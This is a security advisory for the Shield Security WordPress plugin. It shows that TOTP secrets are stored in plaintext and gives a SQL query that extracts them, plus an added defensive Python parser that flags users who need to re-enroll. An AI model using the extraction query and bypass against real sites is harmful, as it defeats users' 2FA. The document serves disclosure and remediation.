Compromise of 2FA secrets through read-only SQLi – (Shield Security <= 16.1.6)

Affected plugin: Shield Security
Active installs: 60,000+
Vulnerable version: <= 16.1.6
Audited version: 16.1..1
Fully patched version:
Recommended remediation: Removal of the plugin

Description

The plugin stores users' TOTP secrets in plaintext in the database.
An attacker who can exploit any one of the plugin's many read-only SQL injections can read those secrets and bypass the 2FA check for every user, indefinitely: a leaked TOTP secret stays valid until the user re-enrolls.

Proof of concept

The following plugin code retrieves a user's TOTP secret from the “wp_usermeta” table:

protected function getSecret() {
	// Reads the user's meta (the serialized 'icwp-wpsf-meta' row) and returns the
	// '<SLUG>_secret' entry as-is: the secret is stored and returned in plaintext.
	$secret = $this->getCon()->getUserMeta( $this->getUser() )->{static::SLUG.'_secret'};
	return empty( $secret ) ? static::DEFAULT_SECRET : $secret;
}

* “static::SLUG” is equal to the string “ga”, so the meta field read here is “ga_secret”.

An attacker with such a read-only SQLi can obtain every user's TOTP secret with a single query:

SELECT user_id, meta_value FROM wp_usermeta WHERE meta_key = 'icwp-wpsf-meta'

Each record is a serialized PHP array containing all of the plugin's user meta for one user.

After deserializing a record with PHP's unserialize() function, its “ga_secret” key holds that user's TOTP secret:

a:8:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:1;s:9:"pass_hash";s:4:"266b";s:5:"tours";a:2:{s:12:"dashboard_v1";i:1662922763;s:13:"navigation_v1";i:1662923128;}s:9:"ga_secret";s:16:"TJD7I4OXNQNPU3RD";s:12:"ga_validated";b:1;s:13:"login_intents";a:1:{s:10:"160ede8d07";a:2:{s:5:"start";i:1662982530;s:8:"attempts";i:0;}}s:9:"flash_msg";N;}

==> ga_secret: TJD7I4OXNQNPU3RD
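As an added example (not part of the original advisory), the following Python script parses the serialized usermeta records shown above and reports which users have a plaintext TOTP secret on record, so an administrator knows who must re-enroll 2FA after the plugin is removed. The parser is my own and handles only the PHP serialization types present in the record (array, string, integer, boolean, null); the first sample row is the record from the advisory, the second is a constructed user without 2FA.

```python
# Added example (not the plugin's code): parse the serialized usermeta rows the
# query above returns and flag users with a plaintext TOTP secret on record.

def _parse(buf: bytes, pos: int):
    """Parse one PHP-serialized value at buf[pos]; return (value, next_pos)."""
    t = buf[pos:pos + 1]
    if t == b"N":                                   # N;  -> null
        return None, pos + 2
    if t in (b"b", b"i"):                           # b:1; / i:123;
        end = buf.index(b";", pos)
        n = int(buf[pos + 2:end])
        return (bool(n) if t == b"b" else n), end + 1
    if t == b"s":                                   # s:LEN:"bytes"; (LEN in bytes)
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                           # skip ':"'
        return buf[start:start + length].decode("utf-8"), start + length + 2
    if t == b"a":                                   # a:COUNT:{key;value;...}
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos, result = colon + 2, {}                 # skip ':{'
        for _ in range(count):
            key, pos = _parse(buf, pos)
            result[key], pos = _parse(buf, pos)
        return result, pos + 1                      # skip '}'
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")

def php_unserialize(blob: bytes):
    value, end = _parse(blob, 0)
    if end != len(blob):
        raise ValueError("trailing data after serialized value")
    return value

def audit_usermeta_rows(rows):
    """rows: (user_id, meta_value) pairs. Reports exposed users without
    echoing the secret, so the report is safe to hand to an administrator."""
    exposed = []
    for user_id, blob in rows:
        meta = php_unserialize(blob)
        if meta.get("ga_secret"):
            exposed.append({"user_id": user_id,
                            "validated": bool(meta.get("ga_validated"))})
    return exposed

# Row 1 is the record shown in the advisory; row 2 is a constructed user without 2FA.
SAMPLE_ROWS = [
    (1, b'a:8:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:1;s:9:"pass_hash";s:4:"266b";s:5:"tours";a:2:{s:12:"dashboard_v1";i:1662922763;s:13:"navigation_v1";i:1662923128;}s:9:"ga_secret";s:16:"TJD7I4OXNQNPU3RD";s:12:"ga_validated";b:1;s:13:"login_intents";a:1:{s:10:"160ede8d07";a:2:{s:5:"start";i:1662982530;s:8:"attempts";i:0;}}s:9:"flash_msg";N;}'),
    (2, b'a:2:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:2;}'),
]

print(audit_usermeta_rows(SAMPLE_ROWS))  # -> [{'user_id': 1, 'validated': True}]
```

In a real cleanup the rows would come from the same SELECT on the live database; the script never writes the secret anywhere, it only names the accounts whose TOTP enrollment must be reset.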

Timeline

Vendor contacted: September 12, 2022
First response: September 12, 2022
Fully patched at:
Publicly disclosed: April 24, 2023
